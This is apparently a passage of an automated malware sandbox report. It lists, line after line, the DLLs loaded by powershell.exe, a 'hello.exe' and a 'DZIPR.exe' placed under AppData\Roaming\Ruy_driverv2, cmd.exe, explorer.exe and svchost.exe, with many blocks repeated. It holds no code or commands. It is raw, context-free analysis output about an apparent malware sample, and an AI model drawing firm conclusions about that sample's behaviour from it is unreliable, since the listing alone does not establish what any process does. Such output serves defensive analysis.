                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hello.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hello.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hello.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hello.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hello.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hello.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hello.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hello.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hello.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hello.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hello.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hello.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hello.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hello.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hello.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hello.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hello.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hello.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hello.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hello.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hello.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hello.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: dzipr.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: pla.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: tdh.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: dzipr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: pla.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: tdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mstask.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: dzipr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: pla.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: tdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mstask.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: dzipr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: pla.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: tdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mstask.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: dzipr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: pla.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: tdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mstask.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
